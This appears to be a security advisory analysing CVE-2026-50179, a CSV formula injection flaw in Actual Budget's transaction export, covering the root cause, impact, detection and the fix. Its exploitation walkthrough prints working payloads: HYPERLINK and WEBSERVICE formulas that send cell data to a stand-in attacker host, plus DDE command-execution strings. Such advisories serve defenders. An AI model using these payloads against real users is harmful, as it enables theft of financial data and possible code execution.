CVE-2026-50179: 
JavaScript 脆弱性の分析と軽減

CVE-2026-50179 is a CSV Formula Injection vulnerability in the @actual-app/web (Actual Budget) npm package, affecting the transaction export functionality. The exportToCSV and exportQueryToCSV functions in packages/loot-core/src/server/transactions/export/export-to-csv.ts pass user-controlled Payee, Notes, Account, and Category strings to csv-stringify without neutralizing formula-trigger characters, allowing injected spreadsheet formulas to survive into exported CSV files. Affected versions are @actual-app/web <= 26.4.0; the issue is patched in version 26.6.0. It was reported by MatissJanis and published to the GitHub Advisory Database on June 22, 2026. The CVSS v3.1 base score is 4.2 (Moderate) (GitHub Advisory, Actual Budget Advisory).

The root cause is CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). The sink is at export-to-csv.ts:56 and :131, where csvStringify(transactionsForExport, { header: true }) is called without a cast callback — csv-stringify v6 only escapes quotes, commas, and CRLF by default, leaving formula-trigger prefixes (=, +, -, @, tab, carriage return) intact. Attacker-controlled strings enter the system via file import parsers (parseCSV, parseOFX, parseQIF, parseCAMT in parse-file.ts) or directly through the UI or @actual-app/api CRUD endpoints; none of these paths strip formula prefixes, and sync.normalizeTransactions only applies title-casing which does not affect non-letter prefix characters. The most reliable exploit payload is =HYPERLINK("http://attacker/?leak="&B2,"Bank refund"), which renders as a benign clickable link in Excel, LibreOffice Calc, and Google Sheets while silently exfiltrating adjacent cell data; =WEBSERVICE/=IMPORTXML can auto-fire in some configurations, and legacy DDE (=cmd|'/c calc'!A0) may achieve RCE on unpatched Excel (GitHub Advisory, Actual Budget Advisory).

Successful exploitation allows an attacker to exfiltrate sensitive financial data — including transaction amounts, account names, balances, payees, and categories — to attacker-controlled URLs via =HYPERLINK clicks or auto-firing =WEBSERVICE/=IMPORTXML formulas. Integrity is also affected: downstream recipients such as accountants, tax preparers, or household members who open the exported CSV may see attacker-crafted display values (e.g., forged "Refund" line items linking to phishing pages), enabling financial fraud. The reach is amplified because Actual Budget exports are routinely shared with third parties, meaning a single malicious imported statement can contaminate every future export of that budget. On legacy, unpatched Excel installations, DDE-based payloads could escalate to remote code execution (GitHub Advisory, Actual Budget Advisory).

1. Craft malicious import file: Prepare a CSV, OFX, QIF, or CAMT file with formula-injected payee or notes fields, e.g.:

Date,Payee,Amount
2026-01-01,"=HYPERLINK(""http://attacker.evil/leak?d=""&B2&C2,""Bank refund details"")",100.00
2026-01-04,"=WEBSERVICE(""http://attacker.evil/?d=""&B2)",10.00

2. Deliver the file to the victim: Social-engineer the victim into importing the file via Account → Import file (e.g., disguise it as a bank statement, shared budget, or expense report from a collaborator).
3. Payload persists in database: parseFile → parseCSV/parseOFX/etc. returns rows with formula strings preserved as payee_name; sync.normalizeTransactions does not strip prefix characters; payees are stored verbatim in the payees table.
4. Victim exports transactions: The victim (or a shared budget user) navigates to Account → menu → Export, triggering exportQueryToCSV at export-to-csv.ts:131, which calls csvStringify without formula neutralization — the formula strings survive into the output CSV.
5. Victim or third party opens the CSV: When the exported file is opened in Excel, LibreOffice Calc, or Google Sheets, =HYPERLINK(...) renders as a clickable link with benign text; clicking it sends adjacent cell values (amounts, account names, balances) to the attacker's server. =WEBSERVICE/=IMPORTXML may fire automatically without any click.
6. Data exfiltration or RCE: The attacker receives financial data at their controlled endpoint. On unpatched Excel with DDE enabled, @SUM(1+1)*cmd|'/c calc'!A0-style payloads may execute arbitrary commands (GitHub Advisory, Actual Budget Advisory).

• File System: Exported CSV files from Actual Budget containing cells that begin with =, +, -, @, tab, or carriage return in Payee, Notes, Account, or Category columns; presence of =HYPERLINK, =WEBSERVICE, =IMPORTXML, or DDE-style strings (e.g., cmd|'/c) in exported .csv files.
• Database/Application: Payee or notes entries in the Actual Budget payees or transactions tables containing formula-trigger prefixes (=, +, -, @) — detectable via direct database inspection or API query.
• Network: Outbound HTTP requests from spreadsheet applications (Excel, LibreOffice, Google Sheets) to unexpected external domains immediately after opening an Actual Budget CSV export; DNS queries or HTTP GET requests to attacker-controlled domains with query parameters containing financial data strings (amounts, account names).
• Logs: Web server access logs on attacker infrastructure showing requests with URL-encoded financial data in query parameters (e.g., ?d=100.00Checking) originating from spreadsheet application user agents (GitHub Advisory, Actual Budget Advisory).

Upgrade @actual-app/web (and @actual-app/api, which shares the same loot-core export path) to version 26.6.0 or later, which is the patched release (GitHub Advisory). The recommended fix is to pass a cast.string callback to csv-stringify at both call sites in export-to-csv.ts that prefixes any formula-trigger string with a single quote (OWASP-recommended neutralization). As defense-in-depth, formula prefixes should also be stripped or neutralized at import time in parse-file.ts for payee_name and notes fields, so the database never stores formula-shaped strings. Until upgrade is possible, users should avoid sharing exported CSVs with third parties and should inspect exported files for formula-trigger characters before opening in spreadsheet applications (Actual Budget Advisory).